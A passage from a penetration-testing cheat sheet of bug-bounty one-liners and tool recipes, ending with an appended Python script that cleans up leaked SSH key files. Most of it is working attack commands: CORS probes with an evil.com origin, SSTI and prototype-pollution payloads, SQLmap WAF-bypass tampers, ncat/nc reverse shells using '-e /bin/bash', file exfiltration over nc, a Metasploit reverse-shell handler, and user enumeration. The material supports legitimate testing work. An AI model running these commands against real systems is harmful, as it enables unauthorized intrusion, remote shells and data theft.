**CORS:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
echo target.com | (gau || hakrawler || waybackurls || katana) | while read url; do if curl -s -I -H "Origin: https://evil.com" -X GET "$url" | grep -qi 'access-control-allow-origin: https://evil.com'; then echo "[Potential CORS found] $url"; else echo "Nothing on $url"; fi; done
```

**Prototype pollution:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
subfinder -d target.com -all -silent | httpx -silent -threads 100 | anew alive.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' alive.txt | page-fetch -j 'window.testparam == "exploit"? 
"[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE" ``` **查找 JS 文件:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat target.txt | (gau || hakrawler || waybackurls || katana) | grep -i -E "\.js" | egrep -v "\.json|\.jsp" | anew js.txt ``` ``` while read -r url; do if curl -s -o /dev/null -w "%{http_code}" "$url" | grep -q 200 && \ curl -s -I "$url" | grep -iq 'Content-Type:.*\(text/javascript\|application/javascript\)'; then echo "$url" fi done < urls.txt > js.txt ``` **隐藏参数:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat subs.txt | (gau || hakrawler || waybackurls || katana) | sort -u | httpx -silent -threads 100 | grep -Eiv '(.eot|.jpg|.jpeg|.gif|.css|.tif|.tiff|.png|.ttf|.otf|.woff|.woff2|.ico|.svg|.txt|.pdf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Z0-9]+" | sed -e 's,'var','"$url"?',g' -e 's/ //g' | grep -Eiv '\.js$|([^.]+)\.js|([^.]+)\.js\.[0-9]+$|([^.]+)\.js[0-9]+$|([^.]+)\.js[a-z][A-Z][0-9]+$' | sed 's/.*/&=FUZZ/g'); echo -e "\e[1;33m$url\e[1;32m$vars";done ``` **提取 JS 中的敏感端点:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat main.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u ``` **SSTI:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` for url in $(cat targets.txt); do python3 tplmap.py -u $url; print $url; done ``` ``` echo target.com | gau --subs --threads 200 | httpx -silent -mc 200 -nc | qsreplace “aaa%20%7C%7C%20id%3B%20x” > fuzzing.txt && ffuf -ac -u FUZZ -w fuzzing.txt -replay-proxy 127.0.0.1:8080 ``` **扫描 IP:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` cat my_ips.txt | xargs -L 100 shodan scan submit --wait 0 ``` **使用 Nuclei 截取屏幕截图:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)** ``` nuclei -l target.txt -headless -t nuclei-templates/headless/screenshot.yaml -v ``` SQLmap 篡改脚本 – WAF 绕过: **[`^ back to one-liners 
^`](#7-one-liners-for-bug-bounty)**

```
sqlmap -u 'http://www.site.com/search.cmd?form_state=1' --level=5 --risk=3 --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes --no-cast --no-escape --dbs --random-agent
```

**Shodan CLI:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
shodan search ssl.cert.subject.cn:"target.com" --fields ip_str | anew ips.txt
```

**Censys CLI:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
censys search "target.com" --index-type hosts | jq -c '.[] | {ip: .ip}' | grep -oE '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+'
```

**Download JS files:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
## curl
mkdir -p js_files; while IFS= read -r url || [ -n "$url" ]; do filename=$(basename "$url"); echo "Downloading $filename JS..."; curl -sSL "$url" -o "js_files/$filename"; done < "$1"; echo "Download complete."

## wget
sed -i 's/\r//' js.txt && for i in $(cat js.txt); do wget "$i"; done
```

**Filter only HTML/XML content types for XSS:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
cat urls.txt | grep "=" | grep "?" \
| uro | httpx -ct -silent -nc | grep -i -E "text/html|application/xhtml+xml|application/xml|text/xml|image/svg+xml" | cut -d '[' -f 1 | anew xml_html.txt

## using curl
while read -r url; do
  if curl -s -o /dev/null -w "%{http_code}" "$url" | grep -q 200 && \
     curl -s -I "$url" | grep -iq 'Content-Type:.*text/\(html\|xml\)'; then
    echo "$url"
  fi
done < urls.txt > xml_html.txt
```

**Get the favicon hash:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
curl https://favicon-hash.kmsec.uk/api/?url=https://test.com/favicon.ico | jq
```

**Find parameters with `x8`:** **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
subfinder -d target.com -silent -all -recursive | httpx -silent | sed -s 's/$/\//' | xargs -I@ sh -c 'x8 -u @ -w parameters.txt -o output.txt'
```

**Find reflected parameters for XSS –** [`xss0r`](https://raw.githubusercontent.com/xss0r/xssorRecon/refs/heads/main/reflection.py): **[`^ back to one-liners ^`](#7-one-liners-for-bug-bounty)**

```
python3 reflection.py urls.txt | grep "Reflection found" | awk -F'[?&]' '!seen[$2]++' | tee reflected.txt
```

## 8. Miscellaneous

A bunch of random stuff can be found here.

**[`^ back to top ^`](#overview)**

### 8.1 Useful Websites

* [jsonlint.com](https://jsonlint.com) – JSON validator and formatter.
* [base64decode.org](https://www.base64decode.org) – Base64 decode and encode.
* [urldecoder.org](https://www.urldecoder.org) – URL decode and encode.
* [bitly.com](https://bitly.com) – URL shortener.
* [pastebin.com](http://pastebin.com/) – Pastebin.
* [getcreditcardnumbers.com](https://www.getcreditcardnumbers.com) – dummy credit card information.
* [offsec.tools](https://offsec.tools/) – collection of penetration testing tools.
* [github.com/mthcht/awesome-lists](https://github.com/mthcht/awesome-lists/tree/main) – large collection of security lists.

### cURL

**[`^ back to top ^`](#overview)**

Download a file:

```
curl https://somesite.com/somefile.txt -o somefile.txt
```

Upload a file:

```
curl https://somesite.com/uploads/ -T somefile.txt
```

| Option | Description |
| --- | --- |
| -d | Sends the specified data in a POST request to the HTTP server |
| -H | Extra header to include in the request when sending HTTP to a server |
| -i | Include the HTTP response headers in the output |
| -k | Proceed and operate server connections otherwise considered insecure |
| -o | Write output to a file instead of stdout |
| -T | Transfer the specified local file to the remote URL, similar to the PUT method |
| -v | Make the operation more talkative |
| -x | Use the specified proxy (protocol://host:port) |
| -X | Specify a custom request method to use when communicating with the HTTP server |

### Ncat

**[`^ back to top ^`](#overview)**

Set up a server listener:

```
ncat -nvlp 9000
ncat -nvlp 9000 > received_data.txt
ncat -nvlp 9000 -e /bin/bash
ncat -nvlp 9000 -e /bin/bash --ssl
ncat -nvlp 9000 --ssl-cert crt.pem --ssl-key key.pem
ncat -nvlp 9000 --keep-open <<< "HTTP/1.1 200 OK\r\n\r\n"
```

Client connecting to a remote host:

```
ncat -nv 192.168.8.5 9000
ncat -nv 192.168.8.5 9000 < sent_data.txt
ncat -nv 192.168.8.5 9000 -e /bin/bash
ncat -nv 192.168.8.5 9000 -e /bin/bash --ssl
ncat -nv 192.168.8.5 9000 --ssl-cert crt.pem --ssl-key key.pem
```

Check whether a connection to a given TCP port (e.g. 22 or 23) is possible:

```
for i in {0..255}; do ncat -nv "192.168.8.${i}" 9000 -w 2 -z 2>&1 | grep -Po '(?<=Connected\ to\ )[^\s]+(?=\.)'; done
for ip in $(cat ips.txt); do ncat -nv "${ip}" 9000 -w 2 -z 2>&1 | grep -Po '(?<=Connected\ to\ )[^\s]+(?=\.)'; done
```

#### Port Scanner

**[`^ back to top ^`](#overview)**

Single port:

```
nc -nvz 192.168.1.23 80
```
Port range:

```
nc -vnz 192.168.1.23 0-1000
```

#### Send a File

**[`^ back to top ^`](#overview)**

Server:

```
nc -lvp 1234 > file_name_to_save
```

Client:

```
nc -vn 192.168.1.33 1234 < file_to_send
```

#### Run a Remote Script

**[`^ back to top ^`](#overview)**

Server:

```
nc -lvp 1234 -e ping.sh
```

Client:

```
nc -vn 192.168.1.33 1234
```

#### Chat with Encryption

**[`^ back to top ^`](#overview)**

Server:

```
ncat -nlvp 8000 --ssl
```

Client (must also use `--ssl`, otherwise the TLS listener rejects the plaintext connection):

```
ncat -nv 192.168.1.33 8000 --ssl
```

#### Banner Grabbing

**[`^ back to top ^`](#overview)**

Request template:

```
nc target port
HTTP_Verb path http/version
Host: url
```

Example:

```
nc www.bla.com.br 80
HEAD / HTTP/1.0
Host: www.bla.com.br
```

#### HTTPS-OpenSSL

**[`^ back to top ^`](#overview)**

If the site uses HTTPS, use openssl instead of nc:

```
openssl s_client -quiet -connect www.bla.com.br:443
```

#### Catch a Shell

**[`^ back to top ^`](#overview)**

Open a listener to catch a shell:

```
rlwrap nc -nlvp 4444
# or
nc -nlvp 4444
```

### multi/handler

**[`^ back to top ^`](#overview)**

Set up the listener (change PAYLOAD, LHOST and LPORT as needed):

```
msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.8.185
set LPORT 9000
exploit
```

### ngrok

**[`^ back to top ^`](#overview)**

Use [ngrok](https://ngrok.com/download) to give a local web server a public address, but do not leave an unhardened web server exposed for long, as that creates a security risk of its own.

### Simple Web-Server

**[`^ back to top ^`](#overview)**

Python web server:

```
python3 -m http.server 8081
```

PHP web server:

```
php -S 0.0.0.0:8081
```

### SSH

**[`^ back to top ^`](#overview)**

Connect via SSH:

```
ssh -o StrictHostKeyChecking=no -T root@
```

Create a private/public key pair named `test`:

```
ssh-keygen -t rsa -b 4096 -f test
```

Sometimes a leaked SSH key fails to load with an error such as `Load key "id_rsa": error in libcrypto`. This can usually be fixed by simply cleaning up the key file.

Newer versions of OpenSSH may refuse `ssh-rsa` keys. This can be fixed by adding the following to `~/.ssh/config`:

```
HostKeyAlgorithms +ssh-rsa
PubkeyAcceptedAlgorithms +ssh-rsa
```

### swaks

**[`^ back to top ^`](#overview)**

Send mail with [swaks](https://github.com/jetmore/swaks):

```
swaks -f ${MAIL_FROM} -t ${MAIL_TO} -s ${MAIL_SMTP} --auth-user=${MAIL_AUTH} --auth-password=${MAIL_PASS} -tlsc -p ${MAIL_PORT} --body ${EMAIL} --header "Subject: Bruteforce Report" --add-header "Content-Type: text/plain; charset=UTF-8" --h-From: '"Cloud Storage" <'${MAIL_FROM}'>'
```

Quickly send a test mail with [swaks](https://github.com/jetmore/swaks):

```
swaks -f ${MAIL_FROM} -t ${MAIL_TO} -s ${MAIL_SMTP} --auth-user=${MAIL_AUTH} --auth-password=${MAIL_PASS} -tlsc -p ${MAIL_PORT} --body "TEST" --header "Subject: Mail Test"
```

### xfreerdp

**[`^ back to top ^`](#overview)**

Simple user enumeration of a Windows target via Kerberos:

```
xfreerdp /v: -sec-nla /u:""
xfreerdp /v:192.168.0.32 -sec-nla /u:""
```

Log in:

```
xfreerdp /u: /g: /p: /v:
xfreerdp /u:administrator /g:grandbussiness /p:bla /v:192.168.1.34
```

### Additional References

**[`^ back to top ^`](#overview)**

Credit to the authors!

* [book.hacktricks.xyz](https://book.hacktricks.xyz/welcome/readme)
* [infosecmatter.com/bug-bounty-tips](https://www.infosecmatter.com/bug-bounty-tips)
* [pentestbook.six2dez.com](https://pentestbook.six2dez.com)
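The SSH section above notes that a key file which has been copied around often fails with `error in libcrypto` and that "cleaning up" the file usually fixes it. The usual culprits are CRLF line endings, indentation or trailing blanks added by a terminal or web page, a missing final newline, and overly permissive file mode. The following is an added example, not code from the fox repository, that performs exactly that clean-up and nothing more: it rewrites the file with LF endings and a single trailing newline, keeps interior blank lines (the blank line after `DEK-Info:` in legacy encrypted PEM is significant), sets mode 0600, and reports what changed. The sample key text is a constructed placeholder, not real key material.

```python
"""Normalize a pasted/leaked SSH private key file (added example, not part of the fox repository)."""
import tempfile
from pathlib import Path
from typing import Dict, Union

# Constructed sample: CRLF endings, indentation, trailing blank lines, NOT a real key.
SAMPLE_RAW = (
    "  -----BEGIN OPENSSH PRIVATE KEY-----  \r\n"
    "AAAAsamplekeymaterialNOTAREALKEY\r\n"
    "-----END OPENSSH PRIVATE KEY-----\r\n\r\n"
)


def normalize_key_text(text: str) -> str:
    """Return the key text with LF endings, per-line whitespace stripped,
    leading/trailing blank lines removed and exactly one final newline.
    Interior blank lines are preserved on purpose (legacy encrypted PEM needs them)."""
    lines = [ln.strip() for ln in text.replace("\r\n", "\n").replace("\r", "\n").split("\n")]
    while lines and not lines[0]:
        lines.pop(0)
    while lines and not lines[-1]:
        lines.pop()
    return "\n".join(lines) + "\n" if lines else ""


def normalize_key_file(path: Union[str, Path]) -> Dict[str, object]:
    """Clean up the key file in place, chmod it to 0600 and report the result."""
    p = Path(path)
    original = p.read_text(encoding="utf-8")
    fixed = normalize_key_text(original)
    changed = fixed != original
    if changed:
        # newline="\n" prevents the platform from re-introducing CRLF on write
        with p.open("w", encoding="utf-8", newline="\n") as fh:
            fh.write(fixed)
    p.chmod(0o600)  # OpenSSH refuses private keys readable by group/others
    first_line = fixed.split("\n", 1)[0] if fixed else ""
    looks_like_key = first_line.startswith("-----BEGIN ") and first_line.endswith("-----")
    return {
        "changed": changed,
        "looks_like_key": looks_like_key,  # only a header sanity check, not a parse
        "mode": p.stat().st_mode & 0o777,
        "text": fixed,
    }


def make_sample_key_file() -> str:
    """Write SAMPLE_RAW to a temporary file and return its path (for a local try-out)."""
    with tempfile.NamedTemporaryFile("wb", suffix=".key", delete=False) as fh:
        fh.write(SAMPLE_RAW.encode("utf-8"))
        return fh.name


if __name__ == "__main__":
    key_path = make_sample_key_file()
    report = normalize_key_file(key_path)
    print(f"{key_path}: changed={report['changed']} mode={report['mode']:o} "
          f"looks_like_key={report['looks_like_key']}")
```

After normalizing, `ssh-keygen -y -f <file>` is the quickest way to confirm OpenSSH can actually load the key; if that still fails, the key material itself is damaged and no whitespace clean-up will help.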